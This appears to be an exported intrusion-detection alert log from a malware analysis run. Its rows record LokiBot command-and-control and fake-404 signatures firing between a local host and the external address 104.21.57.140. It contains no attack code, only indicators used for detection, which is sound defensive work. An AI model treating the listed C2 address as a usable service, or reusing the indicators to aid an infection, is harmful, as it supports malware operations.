2024-12-02T14:47:42.203055+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49914	104.21.57.140	80	TCP
2024-12-02T14:47:43.845851+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49919	104.21.57.140	80	TCP
2024-12-02T14:47:45.764255+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49925	104.21.57.140	80	TCP
2024-12-02T14:47:47.361857+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49929	104.21.57.140	80	TCP
2024-12-02T14:47:49.059293+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49933	104.21.57.140	80	TCP
2024-12-02T14:47:50.699604+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49939	104.21.57.140	80	TCP
2024-12-02T14:47:52.320146+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49943	104.21.57.140	80	TCP
2024-12-02T14:47:53.899018+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49947	104.21.57.140	80	TCP
2024-12-02T14:47:55.453881+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49952	104.21.57.140	80	TCP
2024-12-02T14:47:57.187443+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49956	104.21.57.140	80	TCP
2024-12-02T14:47:58.861617+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49961	104.21.57.140	80	TCP
2024-12-02T14:48:00.495169+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49965	104.21.57.140	80	TCP
2024-12-02T14:48:02.161788+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49971	104.21.57.140	80	TCP
2024-12-02T14:48:05.077723+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49977	104.21.57.140	80	TCP
2024-12-02T14:48:06.749601+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49983	104.21.57.140	80	TCP
2024-12-02T14:48:08.405254+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49988	104.21.57.140	80	TCP
2024-12-02T14:48:09.969317+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49992	104.21.57.140	80	TCP
2024-12-02T14:48:11.655286+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49995	104.21.57.140	80	TCP
2024-12-02T14:48:13.236851+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	50001	104.21.57.140	80	TCP
2024-12-02T14:48:14.998847+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	50004	104.21.57.140	80	TCP
2024-12-02T14:48:16.608052+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	50006	104.21.57.140	80	TCP
2024-12-02T14:48:18.296110+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	50012	104.21.57.140	80	TCP
2024-12-02T14:48:19.906175+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	50016	104.21.57.140	80	TCP
2024-12-02T14:48:21.667040+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	50021	104.21.57.140	80	TCP
2024-12-02T14:48:23.346752+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	50025	104.21.57.140	80	TCP
2024-12-02T14:48:24.985941+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	50031	104.21.57.140	80	TCP
2024-12-02T14:48:26.579169+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	50034	104.21.57.140	80	TCP

ET MALWARE LokiBot Fake 404 Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-02T14:46:32.848190+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49710	TCP
2024-12-02T14:46:34.553112+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49716	TCP
2024-12-02T14:46:36.548291+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49722	TCP
2024-12-02T14:46:38.338335+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49723	TCP
2024-12-02T14:46:39.996641+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49730	TCP
2024-12-02T14:46:41.678314+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49737	TCP
2024-12-02T14:46:43.293584+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49745	TCP
2024-12-02T14:46:44.984213+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49746	TCP
2024-12-02T14:46:46.742024+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49752	TCP
2024-12-02T14:46:48.438705+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49758	TCP
2024-12-02T14:46:50.083810+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49764	TCP
2024-12-02T14:46:51.972164+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49765	TCP
2024-12-02T14:46:53.523509+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49771	TCP
2024-12-02T14:46:55.208979+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49777	TCP
2024-12-02T14:46:56.957364+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49781	TCP
2024-12-02T14:46:58.591098+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49785	TCP
2024-12-02T14:47:00.270525+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49790	TCP
2024-12-02T14:47:01.967778+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49796	TCP
2024-12-02T14:47:03.701899+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49800	TCP
2024-12-02T14:47:05.418962+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49803	TCP
2024-12-02T14:47:07.011266+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49809	TCP
2024-12-02T14:47:08.682468+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49815	TCP
2024-12-02T14:47:10.321448+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49818	TCP
2024-12-02T14:47:11.975279+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49822	TCP
2024-12-02T14:47:13.623756+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49828	TCP
2024-12-02T14:47:15.210858+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49834	TCP
2024-12-02T14:47:16.899399+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49836	TCP
2024-12-02T14:47:18.483637+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49841	TCP
2024-12-02T14:47:20.120547+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49847	TCP
2024-12-02T14:47:21.745852+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49850	TCP
2024-12-02T14:47:23.459121+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49854	TCP
2024-12-02T14:47:25.238973+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49860	TCP
2024-12-02T14:47:26.855911+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49867	TCP
2024-12-02T14:47:28.485526+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49871	TCP
2024-12-02T14:47:30.176498+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49875	TCP
2024-12-02T14:47:31.871182+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49882	TCP
2024-12-02T14:47:33.576652+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49887	TCP
2024-12-02T14:47:35.238941+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49891	TCP
2024-12-02T14:47:36.820183+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49895	TCP
2024-12-02T14:47:38.458368+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49900	TCP
2024-12-02T14:47:40.265349+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49906	TCP
2024-12-02T14:47:41.934270+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49909	TCP
2024-12-02T14:47:43.581302+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49914	TCP
2024-12-02T14:47:45.246793+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49919	TCP
2024-12-02T14:47:47.095295+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49925	TCP
2024-12-02T14:47:48.729038+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49929	TCP
2024-12-02T14:47:50.418563+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49933	TCP
2024-12-02T14:47:52.041979+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49939	TCP
2024-12-02T14:47:53.624049+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49943	TCP
2024-12-02T14:47:55.192162+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49947	TCP
2024-12-02T14:47:56.838696+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49952	TCP
2024-12-02T14:47:58.587191+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49956	TCP
2024-12-02T14:48:00.226501+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49961	TCP
2024-12-02T14:48:01.889194+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49965	TCP
2024-12-02T14:48:04.815767+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49971	TCP
2024-12-02T14:48:06.491726+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49977	TCP
2024-12-02T14:48:08.123211+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49983	TCP
2024-12-02T14:48:09.710511+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49988	TCP
2024-12-02T14:48:11.397389+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49992	TCP
2024-12-02T14:48:12.962661+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	49995	TCP
2024-12-02T14:48:14.589750+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	50001	TCP
2024-12-02T14:48:16.346268+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	50004	TCP
2024-12-02T14:48:17.991479+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	50006	TCP
2024-12-02T14:48:19.645003+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	50012	TCP
2024-12-02T14:48:21.312250+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	50016	TCP
2024-12-02T14:48:23.035716+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	50021	TCP
2024-12-02T14:48:24.703176+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	50025	TCP
2024-12-02T14:48:26.311419+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	50031	TCP
2024-12-02T14:48:27.983460+0100	2025483	1	A Network Trojan was detected	104.21.57.140	80	192.168.2.7	50034	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-02T14:46:32.728102+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49710	104.21.57.140	80	TCP
2024-12-02T14:46:34.433103+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49716	104.21.57.140	80	TCP
2024-12-02T14:46:36.427884+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49722	104.21.57.140	80	TCP
2024-12-02T14:46:38.218158+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49723	104.21.57.140	80	TCP
2024-12-02T14:46:39.876615+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49730	104.21.57.140	80	TCP
2024-12-02T14:46:41.558318+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49737	104.21.57.140	80	TCP
2024-12-02T14:46:43.173637+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49745	104.21.57.140	80	TCP
2024-12-02T14:46:44.864180+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49746	104.21.57.140	80	TCP
2024-12-02T14:46:46.621995+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49752	104.21.57.140	80	TCP
2024-12-02T14:46:48.318545+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49758	104.21.57.140	80	TCP
2024-12-02T14:46:49.963817+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49764	104.21.57.140	80	TCP
2024-12-02T14:46:51.732546+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49765	104.21.57.140	80	TCP
2024-12-02T14:46:53.403457+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49771	104.21.57.140	80	TCP
2024-12-02T14:46:55.088990+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49777	104.21.57.140	80	TCP
2024-12-02T14:46:56.837353+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49781	104.21.57.140	80	TCP
2024-12-02T14:46:58.470919+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49785	104.21.57.140	80	TCP
2024-12-02T14:47:00.150562+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49790	104.21.57.140	80	TCP
2024-12-02T14:47:01.846835+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49796	104.21.57.140	80	TCP
2024-12-02T14:47:03.581894+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49800	104.21.57.140	80	TCP
2024-12-02T14:47:05.298971+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49803	104.21.57.140	80	TCP
2024-12-02T14:47:06.891147+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49809	104.21.57.140	80	TCP
2024-12-02T14:47:08.562385+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49815	104.21.57.140	80	TCP
2024-12-02T14:47:10.201507+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49818	104.21.57.140	80	TCP
2024-12-02T14:47:11.855158+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49822	104.21.57.140	80	TCP
2024-12-02T14:47:13.503645+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49828	104.21.57.140	80	TCP
2024-12-02T14:47:15.090673+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49834	104.21.57.140	80	TCP
2024-12-02T14:47:16.779417+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49836	104.21.57.140	80	TCP
2024-12-02T14:47:18.363637+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49841	104.21.57.140	80	TCP
2024-12-02T14:47:20.000530+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49847	104.21.57.140	80	TCP
2024-12-02T14:47:21.625855+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49850	104.21.57.140	80	TCP
2024-12-02T14:47:23.339059+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49854	104.21.57.140	80	TCP
2024-12-02T14:47:25.118771+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49860	104.21.57.140	80	TCP
2024-12-02T14:47:26.735847+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49867	104.21.57.140	80	TCP
2024-12-02T14:47:28.365300+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49871	104.21.57.140	80	TCP
2024-12-02T14:47:30.056505+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49875	104.21.57.140	80	TCP
2024-12-02T14:47:31.751031+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49882	104.21.57.140	80	TCP
2024-12-02T14:47:33.456486+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49887	104.21.57.140	80	TCP
2024-12-02T14:47:35.118441+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49891	104.21.57.140	80	TCP
2024-12-02T14:47:36.700242+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49895	104.21.57.140	80	TCP
2024-12-02T14:47:38.338383+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49900	104.21.57.140	80	TCP
2024-12-02T14:47:40.145347+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49906	104.21.57.140	80	TCP
2024-12-02T14:47:41.814075+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49909	104.21.57.140	80	TCP
2024-12-02T14:47:43.461307+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49914	104.21.57.140	80	TCP
2024-12-02T14:47:45.081931+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49919	104.21.57.140	80	TCP
2024-12-02T14:47:46.975329+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49925	104.21.57.140	80	TCP
2024-12-02T14:47:48.602398+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49929	104.21.57.140	80	TCP
2024-12-02T14:47:50.298537+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49933	104.21.57.140	80	TCP
2024-12-02T14:47:51.921722+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49939	104.21.57.140	80	TCP
2024-12-02T14:47:53.503954+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49943	104.21.57.140	80	TCP
2024-12-02T14:47:55.072130+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49947	104.21.57.140	80	TCP
2024-12-02T14:47:56.671516+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49952	104.21.57.140	80	TCP
2024-12-02T14:47:58.467226+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49956	104.21.57.140	80	TCP
2024-12-02T14:48:00.104466+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49961	104.21.57.140	80	TCP
2024-12-02T14:48:01.769084+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49965	104.21.57.140	80	TCP
2024-12-02T14:48:04.695776+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49971	104.21.57.140	80	TCP
2024-12-02T14:48:06.371510+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49977	104.21.57.140	80	TCP
2024-12-02T14:48:08.003250+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49983	104.21.57.140	80	TCP
2024-12-02T14:48:09.590513+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49988	104.21.57.140	80	TCP
2024-12-02T14:48:11.277388+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49992	104.21.57.140	80	TCP
2024-12-02T14:48:12.842611+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49995	104.21.57.140	80	TCP
2024-12-02T14:48:14.454568+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	50001	104.21.57.140	80	TCP
2024-12-02T14:48:16.226342+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	50004	104.21.57.140	80	TCP
2024-12-02T14:48:17.869201+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	50006	104.21.57.140	80	TCP
2024-12-02T14:48:19.525064+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	50012	104.21.57.140	80	TCP
2024-12-02T14:48:21.192264+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	50016	104.21.57.140	80	TCP
2024-12-02T14:48:22.915780+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	50021	104.21.57.140	80	TCP
2024-12-02T14:48:24.582221+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	50025	104.21.57.140	80	TCP
2024-12-02T14:48:26.191428+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	50031	104.21.57.140	80	TCP
2024-12-02T14:48:27.863216+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	50034	104.21.57.140	80	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-02T14:46:32.728102+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49710	104.21.57.140	80	TCP
2024-12-02T14:46:34.433103+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49716	104.21.57.140	80	TCP
2024-12-02T14:46:36.427884+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49722	104.21.57.140	80	TCP
2024-12-02T14:46:38.218158+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49723	104.21.57.140	80	TCP
2024-12-02T14:46:39.876615+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49730	104.21.57.140	80	TCP
2024-12-02T14:46:41.558318+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49737	104.21.57.140	80	TCP
2024-12-02T14:46:43.173637+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49745	104.21.57.140	80	TCP
2024-12-02T14:46:44.864180+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49746	104.21.57.140	80	TCP
2024-12-02T14:46:46.621995+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49752	104.21.57.140	80	TCP
2024-12-02T14:46:48.318545+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49758	104.21.57.140	80	TCP
2024-12-02T14:46:49.963817+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49764	104.21.57.140	80	TCP
2024-12-02T14:46:51.732546+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49765	104.21.57.140	80	TCP
2024-12-02T14:46:53.403457+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49771	104.21.57.140	80	TCP
2024-12-02T14:46:55.088990+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49777	104.21.57.140	80	TCP
2024-12-02T14:46:56.837353+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49781	104.21.57.140	80	TCP
2024-12-02T14:46:58.470919+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49785	104.21.57.140	80	TCP
2024-12-02T14:47:00.150562+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49790	104.21.57.140	80	TCP
2024-12-02T14:47:01.846835+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49796	104.21.57.140	80	TCP
2024-12-02T14:47:03.581894+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49800	104.21.57.140	80	TCP
2024-12-02T14:47:05.298971+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49803	104.21.57.140	80	TCP
2024-12-02T14:47:06.891147+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49809	104.21.57.140	80	TCP
2024-12-02T14:47:08.562385+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49815	104.21.57.140	80	TCP
2024-12-02T14:47:10.201507+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49818	104.21.57.140	80	TCP
2024-12-02T14:47:11.855158+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49822	104.21.57.140	80	TCP
2024-12-02T14:47:13.503645+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49828	104.21.57.140	80	TCP
2024-12-02T14:47:15.090673+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49834	104.21.57.140	80	TCP
2024-12-02T14:47:16.779417+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49836	104.21.57.140	80	TCP
2024-12-02T14:47:18.363637+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49841	104.21.57.140	80	TCP
2024-12-02T14:47:20.000530+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49847	104.21.57.140	80	TCP
2024-12-02T14:47:21.625855+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49850	104.21.57.140	80	TCP
2024-12-02T14:47:23.339059+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49854	104.21.57.140	80	TCP
2024-12-02T14:47:25.118771+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49860	104.21.57.140	80	TCP
2024-12-02T14:47:26.735847+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49867	104.21.57.140	80	TCP
2024-12-02T14:47:28.365300+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49871	104.21.57.140	80	TCP
2024-12-02T14:47:30.056505+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49875	104.21.57.140	80	TCP
2024-12-02T14:47:31.751031+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49882	104.21.57.140	80	TCP
2024-12-02T14:47:33.456486+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49887	104.21.57.140	80	TCP
2024-12-02T14:47:35.118441+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49891	104.21.57.140	80	TCP
2024-12-02T14:47:36.700242+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49895	104.21.57.140	80	TCP
2024-12-02T14:47:38.338383+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49900	104.21.57.140	80	TCP
2024-12-02T14:47:40.145347+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49906	104.21.57.140	80	TCP
2024-12-02T14:47:41.814075+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49909	104.21.57.140	80	TCP
2024-12-02T14:47:43.461307+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49914	104.21.57.140	80	TCP
2024-12-02T14:47:45.081931+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49919	104.21.57.140	80	TCP
2024-12-02T14:47:46.975329+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49925	104.21.57.140	80	TCP
2024-12-02T14:47:48.602398+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49929	104.21.57.140	80	TCP
2024-12-02T14:47:50.298537+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49933	104.21.57.140	80	TCP
2024-12-02T14:47:51.921722+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49939	104.21.57.140	80	TCP
2024-12-02T14:47:53.503954+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49943	104.21.57.140	80	TCP
2024-12-02T14:47:55.072130+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49947	104.21.57.140	80	TCP
2024-12-02T14:47:56.671516+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49952	104.21.57.140	80	TCP
2024-12-02T14:47:58.467226+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49956	104.21.57.140	80	TCP
2024-12-02T14:48:00.104466+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49961	104.21.57.140	80	TCP
2024-12-02T14:48:01.769084+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49965	104.21.57.140	80	TCP
2024-12-02T14:48:04.695776+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49971	104.21.57.140	80	TCP
2024-12-02T14:48:06.371510+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49977	104.21.57.140	80	TCP
2024-12-02T14:48:08.003250+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49983	104.21.57.140	80	TCP
2024-12-02T14:48:09.590513+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49988	104.21.57.140	80	TCP
2024-12-02T14:48:11.277388+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49992	104.21.57.140	80	TCP
2024-12-02T14:48:12.842611+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49995	104.21.57.140	80	TCP
2024-12-02T14:48:14.454568+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	50001	104.21.57.140	80	TCP
2024-12-02T14:48:16.226342+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	50004	104.21.57.140	80	TCP
2024-12-02T14:48:17.869201+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	50006	104.21.57.140	80	TCP
2024-12-02T14:48:19.525064+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	50012	104.21.57.140	80	TCP
2024-12-02T14:48:21.192264+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	50016	104.21.57.140	80	TCP
2024-12-02T14:48:22.915780+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	50021	104.21.57.140	80	TCP
